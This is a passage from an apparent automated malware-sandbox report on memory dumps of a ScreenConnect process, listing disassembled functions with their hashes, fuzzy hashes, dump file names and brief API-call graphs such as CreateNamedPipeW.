                                                                                                                                                                                                                                                                          • Instruction ID: 4a15fe1031f5b18ccec218e3121cfec70fc3b42c23959eb8f5ad1cf8eccea120
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1311b120c52b3ae96ac774254368dbff2a4c2a1df4d179601a49450b0ee0209
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F082322582005BC319A778A85189F3BE5DEC2311B1489FBE145CB652DF26DD0A87D0
                                                                                                                                                                                                                                                                          Function 00BAE270 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 207451298882e88cd3f7649125fbefe31756ae8b50706c0b540f96d47d2eebe0
                                                                                                                                                                                                                                                                          • Instruction ID: 55fa716b5ef81b19f082d4be4fef363ba58c0606a7f76b2d771ee991e0102ed7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 207451298882e88cd3f7649125fbefe31756ae8b50706c0b540f96d47d2eebe0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0B271E002199F8B44DFADC84169EFBF5EF89300B24806AD918EB210E331AA128B80
                                                                                                                                                                                                                                                                          Function 00BAAA58 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: c0d8096b19797b61f566aee5b7c7ee70310b0b8386a94a16887cec34c5fef06d
                                                                                                                                                                                                                                                                          • Instruction ID: b8ab36d4b82f62150bf10512d092e9172fa81dbbb2ffb8b3c8f14b9a2e4d697e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0d8096b19797b61f566aee5b7c7ee70310b0b8386a94a16887cec34c5fef06d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4E0DF313006105B8A183B9EB49852EBBDAEBC9B61B14087DF20AC3300CE618C0583A4
                                                                                                                                                                                                                                                                          Function 00BA5979 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 81eec6023f3a54ff740c8e5021f0baf18f1f3d45989666857afa7dce6b5976ee
                                                                                                                                                                                                                                                                          • Instruction ID: b4aa724eadf9393d3d5989a71aa24151694d497dacfa6360416665f31bb7e99f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81eec6023f3a54ff740c8e5021f0baf18f1f3d45989666857afa7dce6b5976ee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06F08C31909288EFCB15CF78D855AAD7BF49E56304B2686EED844DB2A3DB314B04DB42
                                                                                                                                                                                                                                                                          Function 00BAA9B9 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 922f4c98e0cdfeb88c90ccc5d9bdb5f74a328b70862ee2810b3eb1507e43c3ba
                                                                                                                                                                                                                                                                          • Instruction ID: b64eddf4b481eac46bfe0bd612aeac4a25f6813e8d15ffd81987833960df7046
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 922f4c98e0cdfeb88c90ccc5d9bdb5f74a328b70862ee2810b3eb1507e43c3ba
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64E08632A0D0501BC721052DA8686E72BD9DBC52B972901BFD44DC7202D9124C03CFA4
                                                                                                                                                                                                                                                                          Function 00BA0E30 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 960b0ef66a70f11257a2329db7ce39ef40a4098511fb367606e9e605c1ab91d2
                                                                                                                                                                                                                                                                          • Instruction ID: 945943abc5ffe26250c776c5a5f7bad2ea48657a278e3a08073d25ed0ad08e1a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 960b0ef66a70f11257a2329db7ce39ef40a4098511fb367606e9e605c1ab91d2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E0923325410057870867A9A81589F36D9DEC6351B1489FAE20A8B611EF62DE0687D0
                                                                                                                                                                                                                                                                          Function 00BAF950 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 33e49f1ae370b8b1d8121509ac5d44daae7b0f1b04e55b7bfec8835d9cd2fc91
                                                                                                                                                                                                                                                                          • Instruction ID: f73bec85688c1612d7af26518dbf33c6473ae1d8e9d1acf703ead3d492eaa38a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33e49f1ae370b8b1d8121509ac5d44daae7b0f1b04e55b7bfec8835d9cd2fc91
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECE08632B052045BC354961AE850957B3EADBC9764F604479E60CD7356DD769C828690
                                                                                                                                                                                                                                                                          Function 00BA5930 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f8c60b412cb604d7be072c9b6d66d545388157466ec710bd758d72faedabe519
                                                                                                                                                                                                                                                                          • Instruction ID: 18e533335916bdc42b35f053fd6aa643eb230660b95832ff48a18aec53672a2f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8c60b412cb604d7be072c9b6d66d545388157466ec710bd758d72faedabe519
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1E086353111549F830C767DF44845E7BDADBD9621314C12EE516C3388CE349C03CB90
                                                                                                                                                                                                                                                                          Function 00BA3257 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 912a18529bb5e84b207eb08de4e24191076850f84fec5c0b2d9bde9e230b9c04
                                                                                                                                                                                                                                                                          • Instruction ID: ddd95cb6f6b68a5410e76a9489e11e4585e0add3de018246708245484280f8ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 912a18529bb5e84b207eb08de4e24191076850f84fec5c0b2d9bde9e230b9c04
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FE092312196454FC71ADB7CF841A9D3BE5AF86310B090DFAD0409B167CB74BA488381
                                                                                                                                                                                                                                                                          Function 00BABC83 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: dcb235edf381baf0aae09c74c952c740d70a379a6c6846605ea4d11aa02ea0cc
                                                                                                                                                                                                                                                                          • Instruction ID: 09383a6840dd5535fff9586abf89f65307621b91b54fa152fbf00c5320e78c2d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcb235edf381baf0aae09c74c952c740d70a379a6c6846605ea4d11aa02ea0cc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88E086310082808FC711CB38F889588BFE0EF17365B4C09DDD5C18B202DB75A547D792
                                                                                                                                                                                                                                                                          Function 00BA5988 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4fb47b1a323c16db97ffe093513980090f5b9604212f306d0bfe3ae945bc4f3e
                                                                                                                                                                                                                                                                          • Instruction ID: 2524e2cf623377fa05b6ca0f43ed7b463bf00f3dd17ae91b25796b41d45fc133
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb47b1a323c16db97ffe093513980090f5b9604212f306d0bfe3ae945bc4f3e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D01730A0114CEF8B44EFA8E941A5EB7F9EB45300B2085AED908D7200EA31AF049B81
                                                                                                                                                                                                                                                                          Function 00BADF09 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d8fc81872f7546835dfde89d741bdf4a86699403adbd11d98ea55f5bbab4ac81
                                                                                                                                                                                                                                                                          • Instruction ID: f1c0e5ba38d76d310211554529273368c0ac3aef3393cc9b87e6d33d6fcac56b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8fc81872f7546835dfde89d741bdf4a86699403adbd11d98ea55f5bbab4ac81
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FD06C3849E3908FEB12AB6898546523FF0FB07344B9548DAD041CB666EBA80949CB23
                                                                                                                                                                                                                                                                          Function 00BAED38 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e9e3e7ec1ccec24d45f8787a1585cc90cc3674ee025eb1e1e74bf5d48320d1c1
                                                                                                                                                                                                                                                                          • Instruction ID: 370378b5e38e2d3a5f6b3d54dcfb356e1532a22b1d82f5977523db0879e67072
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9e3e7ec1ccec24d45f8787a1585cc90cc3674ee025eb1e1e74bf5d48320d1c1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38D0C73141470D8AC700BF78D454469B7B8EED5240F00C65AE44957121FF70E6D0D681

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:11.8%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:37.5%
                                                                                                                                                                                                                                                                          Total number of Nodes:8
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                          execution_graph 13843 7ff848f43642 13844 7ff848f651d0 CreateNamedPipeW 13843->13844 13846 7ff848f65303 13844->13846 13838 7ff848f48014 13840 7ff848f4801d 13838->13840 13839 7ff848f48082 13840->13839 13841 7ff848f480f6 SetProcessMitigationPolicy 13840->13841 13842 7ff848f48152 13841->13842

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 00007FF849255BB1 Relevance: 5.5, Strings: 3, Instructions: 1775COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0^$I$0`$I$pW%I
                                                                                                                                                                                                                                                                          • API String ID: 0-1166310409
                                                                                                                                                                                                                                                                          • Opcode ID: 61c24aeb148d147097f3ae5c913f7309ed9a187a68490c189a4310ef403ca2a2
                                                                                                                                                                                                                                                                          • Instruction ID: b99087a8a57d7a71c41cac1358587a3707e03f736a4864c7a5097806a23afc24
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61c24aeb148d147097f3ae5c913f7309ed9a187a68490c189a4310ef403ca2a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82C21531A1DAAB8FF7A8FF2894556B5B7E1FFA4390F140179C45EC32D2DE28A9058341
                                                                                                                                                                                                                                                                          Function 00007FF848F43642 Relevance: 1.7, APIs: 1, Instructions: 171pipeCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1147 7ff848f43642-7ff848f6523a 1150 7ff848f6523c-7ff848f65241 1147->1150 1151 7ff848f65244-7ff848f65301 CreateNamedPipeW 1147->1151 1150->1151 1153 7ff848f65309-7ff848f6533c 1151->1153 1154 7ff848f65303 1151->1154 1154->1153
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3287363648.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff848f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateNamedPipe
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2489174969-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1f419c2af990535ef1f55e865f9b2763a580a5c9aad4352a0910b1bb85ca6451
                                                                                                                                                                                                                                                                          • Instruction ID: c13c94a6f9d6748e8c9a63c6016a8bf62fa86cd17202bbf7900f7fd515f4915a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f419c2af990535ef1f55e865f9b2763a580a5c9aad4352a0910b1bb85ca6451
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7551807191CA1C8FDB68EF589845BE9BBE0FB59710F1042AEE04DE3241CB74A8468BC1
                                                                                                                                                                                                                                                                          Function 00007FF849255DC4 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a541558110661367c39485c4e012ecc28137daed71fb0e3451df8ddd3298496b
                                                                                                                                                                                                                                                                          • Instruction ID: 220842a79fe7b667bb4e85a095acb54d5286a35db17f75233df0cff207959a55
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a541558110661367c39485c4e012ecc28137daed71fb0e3451df8ddd3298496b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0812E431E1DAAB4FF7B9BF2844546B9B6D2EFA47E4F140079C42DC32C6DE29B9058240
                                                                                                                                                                                                                                                                          Function 00007FF8492567F9 Relevance: .4, Instructions: 419COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 445c46063452f60a4dd15480498fba2c6398590a8f84a7c89563491a931eb62a
                                                                                                                                                                                                                                                                          • Instruction ID: aebd6d0efa546c268716db1d80ed79732ef15333d181129784eebb04136fe279
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 445c46063452f60a4dd15480498fba2c6398590a8f84a7c89563491a931eb62a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71D1D531A1DAA78FF7B5BB2884146B9B7D2EFA53E4F140179C01DC32C2DE29B9068340
                                                                                                                                                                                                                                                                          Function 00007FF8492526C0 Relevance: 4.0, Strings: 3, Instructions: 209COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: PH$XH$`H
                                                                                                                                                                                                                                                                          • API String ID: 0-2237122608
                                                                                                                                                                                                                                                                          • Opcode ID: 9546dbe7fcc2e977bd150cbbea06b92082262d404cfbe3a4d4471081c9d68371
                                                                                                                                                                                                                                                                          • Instruction ID: b656a8c41ca45f132168e411323b649a6a1ca10f204dec0f313539b8a7918681
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9546dbe7fcc2e977bd150cbbea06b92082262d404cfbe3a4d4471081c9d68371
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9561D532A0C99A4FEBD8EF289455AA177E1FF64760F0400B9C45ECB2D6DE25EC06C780
                                                                                                                                                                                                                                                                          Function 00007FF849257F2B Relevance: 4.0, Strings: 3, Instructions: 208COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 452 7ff849257f2b-7ff849257f3e call 7ff849254340 455 7ff849257f45-7ff849257f54 452->455 457 7ff84925806d-7ff849258078 455->457 458 7ff849257f5a-7ff849257f65 455->458 458->457 460 7ff849257f6b-7ff849257f7d 458->460 461 7ff849257f7f-7ff849257f9c 460->461 462 7ff849257fc9-7ff849257fef 460->462 466 7ff849258079-7ff849258089 461->466 467 7ff849257fa2-7ff849257fc7 461->467 468 7ff849257ff0-7ff84925800c 462->468 471 7ff84925808b 466->471 472 7ff849258091 466->472 467->462 481 7ff849258061-7ff849258063 468->481 471->472 475 7ff849258095-7ff8492580bb 472->475 476 7ff849258093 472->476 475->481 482 7ff8492580bd-7ff8492580d2 475->482 476->475 479 7ff8492580d5-7ff8492580e0 476->479 483 7ff8492580e4-7ff849258135 481->483 484 7ff849258065-7ff849258069 481->484 482->479 487 7ff84925817d-7ff84925819b 483->487 488 7ff849258137-7ff849258140 483->488 484->457 484->468 493 7ff849258142 488->493 493->493
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0$I$8$I$$I
                                                                                                                                                                                                                                                                          • API String ID: 0-97904817
                                                                                                                                                                                                                                                                          • Opcode ID: 9cb2ce2a26ca8e576275a228443476c50cde2c16315da2f60d84421bb88de4a7
                                                                                                                                                                                                                                                                          • Instruction ID: 7d0754dbd9df55f17dba1b8b4132125effb1080aa0b260c609a6267ad8530bbf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cb2ce2a26ca8e576275a228443476c50cde2c16315da2f60d84421bb88de4a7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0514631E0EADA4FF7A9BF3854155B5BBA0EF65390B0444FAC05DC71C3EE59A8058381
                                                                                                                                                                                                                                                                          Function 00007FF849250395 Relevance: 3.2, Strings: 2, Instructions: 651COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
